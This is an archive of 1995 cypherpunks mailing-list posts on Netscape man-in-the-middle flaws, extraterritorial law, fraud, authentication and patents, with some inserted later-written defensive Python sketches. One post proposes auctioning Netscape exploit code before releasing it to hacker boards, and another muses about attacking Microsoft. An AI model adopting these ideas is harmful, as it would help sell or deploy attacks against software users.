The US has frequently tried to reach citizens anywhere in the world.  
Thus when private ownership of gold was banned in the US in the '30s, the 
regs outlawed possession of gold by Americans anywhere on earth.

Likewise, when the Feds proposed federal licensing of space launch 
vehicles a few years ago, they proposed outlawing unlicensed space 
launches by Americans anywhere on earth.

Obviously, nuclear technology was controlled so that it was illegal for 
Americans who had nuclear skills to work in nuclear power plants in 
certain countries.

Such laws and regulations usually apply to US citizens (whether resident 
or not) and non-citizens who are US residents.

> What if you were a dual citizen (US/Canada in my case)?

Dual citizens are bound by the laws of both countries.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 14 Oct 95 00:04:37 PDT
To: cypherpunks@toad.com
Subject: Re: Same ol' massive MITM exposure in Netscape 2.01b
In-Reply-To: <Pine.SOL.3.91.951013122654.26464D-100000@chivalry>
Message-ID: <307F601F.19A2@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero wrote:
> 1) The client does not do any verification that the certificate used for
> the transaction is one associated with the server, allowing MITM
> substitutions as long as the server has a properly signed certificate
> 
> 2) The client does not issue warnings for redirections from one https
> page to another https page, even if the url to which it is redirected has
> a different hostname to the url originally dereferenced.

  I'm working on these right now.  A future beta will have fixes for
this.

> 3) In the case of redirection, the document info screen does not provide
> information about the originally referenced page, just the final page.
> This allows the MITM to intercept the first request, steal the request
> data, then issue a redirect to hide the certificate used in the intercept.

  If the previous two are fixed, it doesn't seem that this is really
important.

> 4) In the beta version, the document info page does not display the
> security info (I did check with  MITM disabled).

  Did you have the disk cache turned off?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
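
Points 1 and 2 in the list quoted above come down to two client-side checks: the certificate must name the host that was requested, and a redirect between https pages that changes host must be surfaced. A sketch of both follows as an added example, not Netscape's code; the function names, the list of DNS names taken from the certificate, the single left-most-label wildcard rule and the host names are assumptions of this example.

```python
from urllib.parse import urlsplit


def labels(name):
    """Lower-case a DNS name, drop one trailing dot, split into labels."""
    if name.endswith("."):
        name = name[:-1]
    return name.lower().split(".")


def name_matches(pattern, host):
    """True if one certificate DNS name covers the requested host.

    Assumed wildcard rule: '*' is accepted only as the entire left-most
    label, stands for exactly one label, and must be followed by at
    least two fixed labels ('*.example' matches nothing).
    """
    p, h = labels(pattern), labels(host)
    if len(p) != len(h) or "" in p or "" in h:
        return False
    if p[0] == "*":
        if len(p) < 3 or "*" in "".join(p[1:]):
            return False
        return p[1:] == h[1:]
    if "*" in pattern:
        return False            # partial wildcards such as 'w*.shop.example'
    return p == h


def certificate_covers(cert_dns_names, requested_host):
    """Binding check: some name in the certificate must match the host the
    user asked for. A properly signed certificate alone is not enough."""
    return any(name_matches(n, requested_host) for n in cert_dns_names)


def check_connection(url, cert_dns_names, chain_valid):
    """Decide whether to proceed with an https request.

    chain_valid is the result of signature/chain validation, which this
    example takes as an input rather than implementing.
    """
    host = urlsplit(url).hostname or ""
    if not chain_valid:
        return "reject: certificate chain not trusted"
    if not certificate_covers(cert_dns_names, host):
        return "reject: certificate is not for " + host
    return "ok"


def redirect_warning(original_url, redirect_url):
    """Return a warning when a redirect from an https page changes host
    or leaves https, else None."""
    a, b = urlsplit(original_url), urlsplit(redirect_url)
    if a.scheme != "https":
        return None
    if b.scheme != "https":
        return "redirect leaves https"
    if (a.hostname or "") != (b.hostname or ""):
        return "redirect changes host: %s -> %s" % (a.hostname, b.hostname)
    return None


if __name__ == "__main__":
    # Constructed case: the request is for shop.example, but the certificate
    # presented is a validly signed one issued for other.example.
    print(check_connection("https://shop.example/pay", ["other.example"], True))
    print(check_connection("https://shop.example/pay", ["shop.example"], True))
    print(redirect_warning("https://shop.example/pay", "https://other.example/pay"))
```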




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 14 Oct 95 00:02:22 PDT
To: cypherpunks@toad.com
Subject: Re: Anguilla Cypherpunks Meeting
Message-ID: <v02120d15aca51d82e753@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



[various comments about extraterritorial reach]

Laws that affect the behavior of citizen-units, no matter where
they go, rest on the theory of "personal jurisdiction".

Note that in addition to ITAR, the various laws on money laundering,
as well as the RICO statutes, apply to US citizens wherever they
may be. Ditto for tax laws -- one of the little gems that I
learned last week was that penalties for failure to report worldwide
income are going to be substantially increased. I guess they're
not getting very good compliance for some reason...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 14 Oct 95 00:16:32 PDT
To: cypherpunks@toad.com
Subject: AP on trashing/computer fraud ring
Message-ID: <v02120d16aca5214fcc16@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Although I generally agree that capturing information online has
certain advantages to the criminal over going through the trash,
that certainly didn't stop this bunch.

Doug [wondering if this will affect the market for home shredders]

=======================

        ATLANTA (AP) -- Thirty people have been charged in a $10 million
fraud scheme that involved counterfeiting checks, bank statements
and credit card receipts pulled out of the trash.
        ``What we're finding is people are getting more and more clever
with what they pull out of the trash,'' U.S. Attorney Kent
Alexander said. ``This is the most clever scam I've ever seen.''
        The defendants, who defrauded people in 17 states, used checks,
bank statements, credit card receipts and other documents from
garbage bins to create counterfeit checks, false driver's licenses
and false credit reports, Alexander said.
        Investigators said software was used to rub out information on
the discarded paper. Counterfeit blank checks, printed on
high-quality color printers, were allegedly used to defraud banks
of $2 million.
        A core group of about eight people moved the operation to
Atlanta from New Jersey five years ago because they thought it
would be easy to take advantage of Southerners, the prosecutor
said.
        Of the 30 people charged, 24 have pleaded guilty, Alexander
said. Twelve of the 24 have been sentenced to jail terms of up to
eight years and restitution of up to $218,070.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Fri, 13 Oct 95 23:07:57 PDT
To: cypherpunks@toad.com
Subject: Re: applications
Message-ID: <v02130502aca4f00a52a5@[134.84.101.186]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:50 pm 10/13/95, cYberpUnc wrote:
>        I know this isn't what you guys generally talk about but I was curious.
>Off the top of your head do you know of any sites where I can get kracking
>apps for macs?  Any information would be greatly appreciated.

Before looking at the address information I was going to send a one line: "Go away" reply to the question. I thought you promised to try to be less obnoxious. If you'd calm down and read the list for a while you might realize why this might not be the place to pose such questions. Why not take a look at the newsgroup alt.2600? You might find it a rather rude place to frequent and I'd certainly never send my 13 year old there (my oldest is currently 8) but I get the impression the topics you'd find there might prove more interesting than the political and/or technical discussions you'll find here. By all means enjoy yourself here but spend more time listening.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@gofast.net
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 14 Oct 95 00:11:18 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510132330.XAA18917@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


And some of us wish 2.0 would show images (the windoze 16 version)
And I'm not even clever, and have downloaded three copies.

>  We also can't visit every web page, or think of every combination
>of features that clever people in the real world come up with every
>day.  
>
>	--Jeff
>
>-- 
>Jeff Weinstein - Electronic Munitions Specialist
>Netscape Communication Corporation
>jsw@netscape.com - http://home.netscape.com/people/jsw
>Any opinions expressed above are mine.
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Sat, 14 Oct 95 01:16:37 PDT
To: cypherpunks@toad.com
Subject: Guess what I found...
Message-ID: <199510140816.CAA07071@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Newsgroups: comp.os.ms-windows.win95.misc,alt.fan.bill-gates,alt.privacy
Subject: Re: Microsoft Network: Hard Drive Raid
Date: 11 Oct 1995 23:59:58 -0700
Message-ID: <45iede$dp2@Networking.Stanford.EDU>
References: <45h0v7$579@news.corpcomm.net>

rryan@blackhills.com (Richard Ryan) writes:
>Had my first hard core, proveable case of MSN reading someones drive. Store 
>Client had entered fantasy company name upon installing a program. Forgot about 
>it, didn't tell anyone. 2 days after downloading a simple text file from MSN a 
>junk mail offering from Pitney-Bowes showed up in his snail mailbox addressed 
>to him c/o the fantasy company. Somebody is playing somewhere they shouldn't 
>be. Any comments, Microsoft? 

I registered as Richard E. Graves (changing middle initials and adding an
unnecessary suite number to your address are good ways to track who has
been selling whom your address). Richard E. Graves also received mail from
Pitney-Bowes.

Microsoft says they don't sell their mailing lists. Clearly, someone has
taken advantage of security holes in the NT servers that make up MSN and
*stole* the mailing lists. Maybe unauthorized external access accounts for
the abysmal performance of MSN, in part.

-rich
 moderator of the win95netbugs list
 http://www-dccs.stanford.edu/NetConsult/Win95Net/faq.html
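
The tagging trick Graves describes above (a different middle initial and an unnecessary suite number for each organisation you register with), worked through as an added example that is not part of the original post. The class, the names and the addresses are constructed for illustration.

```python
import re
import string


class CanaryIdentity:
    """Hand each organisation its own (middle initial, suite number) variant."""

    def __init__(self, first, last, street, first_suite=100):
        self.first, self.last, self.street = first, last, street
        self._first_suite = first_suite
        self._by_org = {}    # organisation -> (initial, suite)
        self._by_suite = {}  # suite number -> organisation (always unique)

    def issue(self, org):
        """Return the (name, address) pair to register with `org`; stable per org."""
        if org not in self._by_org:
            n = len(self._by_org)
            # Initials repeat after 26 organisations; the suite number never does.
            variant = (string.ascii_uppercase[n % 26], self._first_suite + n)
            self._by_org[org] = variant
            self._by_suite[variant[1]] = org
        initial, suite = self._by_org[org]
        return (f"{self.first} {initial}. {self.last}",
                f"{self.street}, Suite {suite}")

    def attribute(self, label):
        """Map the text of a received address label to (organisation, basis)."""
        text = " ".join(label.split())  # labels arrive re-wrapped and re-cased
        name = re.search(
            rf"\b{re.escape(self.first)}\s+([A-Za-z])\.?\s+{re.escape(self.last)}\b",
            text, re.I)
        suite = re.search(r"(?:\bSuite|\bSte\.?|#)\s*(\d+)\b", text, re.I)
        initial = name.group(1).upper() if name else None
        number = int(suite.group(1)) if suite else None

        if number is not None:
            org = self._by_suite.get(number)
            if org is None:
                return (None, "unknown suite")
            if initial is None:
                # Bulk mailers often drop middle initials; the suite still identifies.
                return (org, "suite only")
            if self._by_org[org][0] == initial:
                return (org, "initial and suite")
            # Two markers pointing at different sources: lists were merged or edited.
            return (None, "initial and suite disagree")
        if initial is not None:
            matches = [o for o, (i, _) in self._by_org.items() if i == initial]
            if len(matches) == 1:
                return (matches[0], "initial only")
            return (None, "ambiguous initial" if matches else "unknown initial")
        return (None, "no marker on label")


if __name__ == "__main__":
    # Constructed sample data, not taken from the post.
    me = CanaryIdentity("Pat", "Example", "1 Constructed Way")
    for org in ("online-service", "book-club"):
        print(org, "->", me.issue(org))
    junk_mail = "PAT A EXAMPLE\n1 CONSTRUCTED WAY STE 100\nANYTOWN"
    print(me.attribute(junk_mail))
```

A match shows only which registration the address came from, not how it left that organisation (sale, theft, or a shared processor).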





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Sat, 14 Oct 95 04:18:49 PDT
To: cypherpunks@toad.com
Subject: airport security
Message-ID: <951014071611.44602170@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Roy M. Silvernail wrote:

>Have you flown recently?  They now ask you this scripted question about
>whether you have been approached by anyone you don't know since arriving
>at the airport, and warn you not to accept anything from a stranger or
>leave your carry-on baggage unattended until you board the plane.  The
>ticket agent told me it was a "new FAA regulation".  I hadn't flown
>anywhere for a few years.  Anyone know how long this has been happening?
>         Goodbye freedom, hello police state.
>I wonder how long before I need a passport to cross a state line...

  The US is merely trying to catch up to what the Europeans have been doing
for over a decade. In fact, the US still has a way to go. You ought to pass
through Heathrow in London some time to see what real airport security looks
like. The US security changes are a recent response, starting after the
World Trade Center bombing and being stepped up on a continuing basis.
Today you need a picture ID to board with your ticket. Tomorrow...? We have
lived in relative safety compared to the rest of the world, but I think those
days are over. 

Usual disclaimer.  Bob Bruen.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 14 Oct 95 04:56:18 PDT
To: cypherpunks@toad.com
Subject: Netscape rewards are an insult
Message-ID: <9510141153.AA16412@all.net>
MIME-Version: 1.0
Content-Type: text


	The idea that Netscape (like Microsoft) thinks they can get free
testing services from all over the net by real experts just by offering
a tee shirt is downright offensive.

	I have a better idea.  How about an open market in break-in
software.  We crack Netscape and offer the crack code to the highest
bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
outbid the competition by a factor of 2 to get the details of the hole.
Here's how it works:

	- We get a panel of 5 cypherpunk judges who test each claimed hole.
	- Exploit code is sent to the panel for verification.
	- If they verify the hole, it is put up for bid.
	- Winning bidder gets the code for 3 months before it is released
	  on hacker BBS systems throughout the world.
	- The panel of judges splits 25% of the money paid for the code
	  as pay for their efforts.  The rest goes to the author.

	I have an even better idea.  How about if Netscape gets some
competent programmers with real security expertise, adds in some good
change controls, a serious internal testing program, quality control ala
ISO-9000, internal IT auditors, external IT auditors, training and
education for their employees, and everything else it takes to be in the
software business in a serious way.

	As an alternative, we could help them contact the shareholders
for a lawsuit.  After all, they are a public company now and are responsible
to the shareholders for the value of their stock.  If it goes down because
they aren't doing an adequate job of software quality control, the officers
may be personally liable.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sat, 14 Oct 95 05:43:35 PDT
To: cypherpunks@toad.com
Subject: Re: mental cryptography
In-Reply-To: <199510132226.PAA13627@jobe.shell.portal.com>
Message-ID: <199510141243.IAA27588@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


hfinney@shell.portal.com writes:
 > I have read one paper which attempts to solve this problem, called "Human
 > Identification through Insecure Channel".  Unfortunately my papers are in
 > a mess right now so I don't have the reference handy.  It was by some
 > Japanese researchers, published in one of the proceedings books.  I
 > believe a follow-on paper was published within the last year or two which
 > had some improvements or corrections to their algorithm.  Sorry to be so
 > vague, I'll try to dig out more info over the weekend.

The article, by T. Matsumoto and H. Imai, was in Eurocrypt '91, which
is published as vol. 547 of "Lecture notes in computer science".

The only followup article I could find was:
C.-H. Wang, T. Hwang, and J.-J. Tsai, "On the Matsumoto and Imai's
[sic] human identification scheme." (LNCS 921, 1995)

 > >I am sure better algorithms can be found for this purpose if mental 
 > >cryptography is made explicit as a design goal.  Perhaps it should be?
 > 
 > It's a hard problem to solve in general because you have only a human
 > mind to do the identification algorithm but you have computers to try to
 > break it.  But I would like to see the problem get more attention.

It may be that the approach is off anyway. Credit cards have only
signature verification -- if the salesperson bothers -- because stolen
cards are reported. You don't need a strong authentication technique
if a stolen card is easy to cancel.

Of course, perhaps this encourages someone to steal your card and
incapacitate you before you can report it. That's why we have
PINs... so that someone can steal your card, threaten you until you
reveal your PIN, and then incapacitate you... Hmm...

Even with a weak PIN system for authentication, you can always provide
a "duress" PIN, right?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sat, 14 Oct 95 05:59:18 PDT
To: cypherpunks@toad.com
Subject: Re: mental cryptography
In-Reply-To: <199510132226.PAA13627@jobe.shell.portal.com>
Message-ID: <199510141259.IAA27807@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Loofbourrow writes:
 > C.-H. Wang, T. Hwang, and J.-J. Tsai, "On the Matsumoto and Imai's
 > [sic] human identification scheme." (LNCS 921, 1995)

Uh, silly me, that happens to be the EUROCRYPT '95 proceedings.

Boy, and isn't it fun to receive all the bounce messages from every
post to cypherpunks?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com (Miguel Diaz)
Date: Sat, 14 Oct 95 06:04:58 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510141302.JAA04592@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes in part:

>	The idea that Netscape (like Microsoft) thinks they can get free
>testing services from all over the net by real experts just by offering
>a tee shirt is downright offensive.
>

Ditto.  The next major hack of Netscape will likely be used to 
bring that company to its knees. Unless one assumes that 
obvious backdoors will still be unprotected by their new code, 
a lot of computing time for brute force attacks and algorithm 
development will have to be spent to properly crack Netscape 
again. I seriously doubt the successful individuals will 
merely settle for fame and not fortune this time around.

OTOH I would much rather see MS get hacked next. If the 
rumors, which are piling now, on MS being a Peeping Tom when 
it comes to hard drives are true, I wonder if there might be a 
way to send a byte bomb to their bit bucket??.......







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 14 Oct 95 09:21:34 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <199510141621.JAA19984@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:16 AM 10/14/95 -0400, Bob Bruen wrote:

>  The US is merely trying to catch up to what the Europeans have been doing
>for over a decade. In fact, the US still has a way to go. You ought to pass
>through Heathrow in London some time to see what real airport security looks
>like. The US security changes are a recent response, starting after the
>World Trade Center bombing and being stepped up on a continuing basis.
>Today you need a picture ID to board with your ticket. Tomorrow...? We have
>lived in relative safety compared to the rest of the world, but I think those
>days are over. 

I remember back during one of the previous FAA panics over terrorism.  I was
at the Portland airport discussing the measures with an FAA inspector.  He
explained why they had to have all the searches and stuff to stop anyone
from blowing up the plane.  I pointed out to him that if anyone wanted to do
that, they would just lay off a line of mortars from the hills overlooking
the airport across the river.  He got very quiet and very worried...

You cannot stop someone who is determined to do terrorist acts.  And the
more the government stomps down on dissent, the more various groups will get
pissed off and perform terrorist acts, which will cause them to crack down
even harder.  (And on and on and on.)  They forget that the imposition of
order increases the escalation of chaos.

What does this have to do with crypto?  Not a whole lot, other than it will
be one of the first things to be outlawed in the futile attempt to stomp out
unauthorized communications.  Gotta watch the proles every minute...

"Welcome to the global village!" - Marshall "Number 6" McLuhan
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip J. Nesser" <pjnesser@rocket.com>
Date: Sat, 14 Oct 95 10:01:07 PDT
To: fc@all.net
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <199510141700.KAA06274@oac1.rocket.com>
MIME-Version: 1.0
Content-Type: text/plain



Have things really come to this?  Besides the legal implications of
discovering a hole and then selling the information to someone, (who
presumably will only want this information for one purpose) where has the
attitude of doing for the sake of doing gone?  Has Netscape been pestering
security experts on the net for free work?  Have they been plaguing people
or lists with email asking the net to do their jobs?  

I am tired of hearing people who may have had the urge to find weaknesses
and bugs now going greedy and deciding that they should be paid for it.  If
you don't want to participate then don't!  It's that simple.  If you feel
netscape is a greedy money grubbing company who deserves to pay 25k for a
bug report then start a company and develop a competing product which you
feel deserves to get bug reports.  

The reason why the Internet has become so popular/powerful is the
willingness of people to help out and distribute information.  As a
computer/networking professional I have saved hundreds of hours worth of
my time when someone has been able to answer a question or solve a problem
for me.  Likewise I have and continue to give back just as many hours
answering others' questions.  That attitude is completely lacking in your
suggestion and I can only hope that those opinions are in the minority
even today.

The ironic part is the people who have been the most successful at finding
bugs are not the ones who are demanding money for it!

--->  Phil

>From: fc@all.net (Dr. Frederick B. Cohen)
>Date: Sat, 14 Oct 1995 07:53:53 -0400 (EDT)

>	The idea that Netscape (like Microsoft) thinks they can get free
>testing services from all over the net by real experts just by offering
>a tee shirt is downright offensive.

>	I have a better idea.  How about an open market in break-in
>software.  We crack Netscape and offer the crack code to the highest
>bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
>outbid the competition by a factor of 2 to get the details of the hole.
>Here's how it works:

>	- We get a panel of 5 cypherpunk judges who test each claimed hole.
>	- Exploit code is sent to the panel for verification.
>	- If they verify the hole, it is put up for bid.
>	- Winning bidder gets the code for 3 months before it is released
>	  on hacker BBS systems throughout the world.
>	- The panel of judges splits 25% of the money paid for the code
>	  as pay for their efforts.  The rest goes to the author.

>	I have an even better idea.  How about if Netscape gets some
>competent programmers with real security expertise, adds in some good
>change controls, a serious internal testing program, quality control ala
>ISO-9000, internal IT auditors, external IT auditors, training and
>education for their employees, and everything else it takes to be in the
>software business in a serious way.

>	As an alternative, we could help them contact the shareholders
>for a lawsuit.  After all, they are a public company now and are responsible
>to the shareholders for the value of their stock.  If it goes down because
>they aren't doing an adequate job of software quality control, the officers
>may be personally liable.

>-- 
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Fri, 13 Oct 95 10:19:01 PDT
To: Adam Shostack <adam@homeport.org>
Subject: Re: IDEA algorithm
Message-ID: <v02120d03aca5a290d1fe@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:50 PM 10/12/95, Adam Shostack wrote:
>| (Btw... what would be the absolute coolest thing folk would like to see
>| added to RSAREF? That is, other than code that we will need to negotiate
>| for. What new thing, speed upgrade, enhancement, etc would just tickle?)
>
>        Consistent pricing.  The knowledge that any app I develop
>using RSAREF can be made into licensed for commercial use product for
>a set, known, published fee.  This would be the biggest win for
>Consensus.

To some degree that is already true. There is no upfront cost for the
licensing, so it is straight royalty based. Right now it's 5-4% declining
with gross sales.

>        Another really big win would be to add more entry points to
>the code to legitimize Wei Dai's excellent Crypto++ library, which has
>to jump in at all sorts of unpublished interfaces.

I'll look into this one. We have the ability to add more entry points. Thanks.
That is exactly the kind of thing I was hoping to get.

>Adam

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henry Wertz <hwertz@exclusive.com>
Date: Sat, 14 Oct 95 08:47:12 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <Pine.LNX.3.91.951014104533.30092A-100000@henry.henry.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> 	The idea that Netscape (like Microsoft) thinks they can get free
> testing services from all over the net by real experts just by offering
> a tee shirt is downright offensive.
> 
> 	I have a better idea.  How about an open market in break-in
> software.  We crack Netscape and offer the crack code to the highest
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
> outbid the competition by a factor of 2 to get the details of the hole.
> Here's how it works:
*cut*
     You know, this all seems kind of greedy to me.. It used to be people
would find holes for *fun* and not for profit.  It's still possible to do
that you know 8-).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 14 Oct 95 08:04:03 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <Pine.3.89.9510141012.A56556-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> 	I have a better idea.  How about an open market in break-in
> software.  We crack Netscape and offer the crack code to the highest
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
> outbid the competition by a factor of 2 to get the details of the hole.
> Here's how it works:
> 
Funny that you mention it, the other mailing list (or rather set of lists)
I'm on is devoted to just such a market system. The Idea Futures home page
is at http://if.arc.ab.ca/~jamesm/IF/IF.shtml. You'll find a few familiar 
faces. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 14 Oct 95 08:38:11 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <Pine.3.89.9510141135.A70744-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> 	The idea that Netscape (like Microsoft) thinks they can get free
> testing services from all over the net by real experts just by offering
> a tee shirt is downright offensive.

   
THE NETSCAPE BUGS BOUNTY 

(major snip)   
   
   And if the security bug you find is severe as defined by Netscape, and
   hasn't been previously found, and can be reproduced by us, we'll write
   you a check for $1000. 
   
   "Previously Found" means that either an internal tester or someone
   else who doesn't work for Netscape has already reported a bug that
   causes the same defect.

That's a bit more than just a t-shirt. Since they're being open about 
bug finding, it would be reasonable and helpful for them to publish all
discovered bugs to prevent duplication and give people a forum for 
concentrating efforts. 

As for the t-shirts, it'd be real nice at job interviews to show up with 
personalized "(insert your name here) cracked netscape, and all I got was 
this lousy t-shirt" signed with netscape's pgp key (and verifiable at 
their soon to appear (hint, hint) "Bug tester's Hall of Fame"). Looks
nice on CV's too.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 14 Oct 95 11:43:18 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: [URGENT] Where are we meeting today?
Message-ID: <v02120d19aca5c279a930@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



  Place: Sparcy's cafeteria, building 21, Sun Microsystems
               Mountain View, California

  Directions: Take 101 to Amphitheater Parkway.  Turn left
               onto Garcia, and drive about 1/2 mile and turn
               onto the first genuine side street which is
               named Marina Way.   Drive about 1/4 mile and look
               for a right hand turn onto Coast.   Building 21
               will be on your left.  It's on the corner of Coast
               and Marina Way.   There's plenty of parking there.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Sat, 14 Oct 95 11:56:14 PDT
To: eli@UX3.SP.CS.CMU.EDU
Subject: DSS patent license
Message-ID: <rschlafly2871855540>
MIME-Version: 1.0
Content-Type: text/plain



>>> RSA Data Security, Inc.
>>> today announced that it is now licensing patents for the Digital Signature
>>> Standard (DSS), the U.S. government standard for digital signatures.
>> 
>> I believe someone was suing the U.S. government on the grounds that the
>> public signature standard wasn't supposed to require proprietary
>> technology.  Has this gone anywhere yet?
>> 
>> --
>>    Eli Brandt
>>    eli+@cs.cmu.edu

Yes, I had such a lawsuit.  No, it didn't go anywhere in the courts,
but the feds did eventually cave in to the principal demand of my
suit: That the DSA patent be made available to anyone on a royalty-free
basis.

So how is it that RSADSI and Cylink/CKC claim you need licenses to
their patents to use DSS?  Because they have other patents.  I have
another lawsuit directed at those patents.  Stay tuned.

Roger Schlafly
rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 14 Oct 95 09:02:40 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: The incredible bouncing mailbox (was Re: mental cryptography)
In-Reply-To: <199510141259.IAA27807@hammond.cis.ohio-state.edu>
Message-ID: <Pine.3.89.9510141135.B70663-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 14 Oct 1995, Nathan Loofbourrow wrote:

> Nathan Loofbourrow writes:

> Boy, and isn't it fun to receive all the bounce messages from every
> post to cypherpunks?
Ok, who wants to sic a PI on this Jason P. Jones tentacle or call his local
morgue to see if he's alive enough to delete his mailbox?

A testament to too many high-volume mailing lists.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sat, 14 Oct 95 09:50:10 PDT
To: Tom Edwards <tedwards@access.digex.net>
Subject: Re: Yes, indeed the PA law is for real!
In-Reply-To: <Pine.SUN.3.91.951013183116.11492A@access5.digex.net>
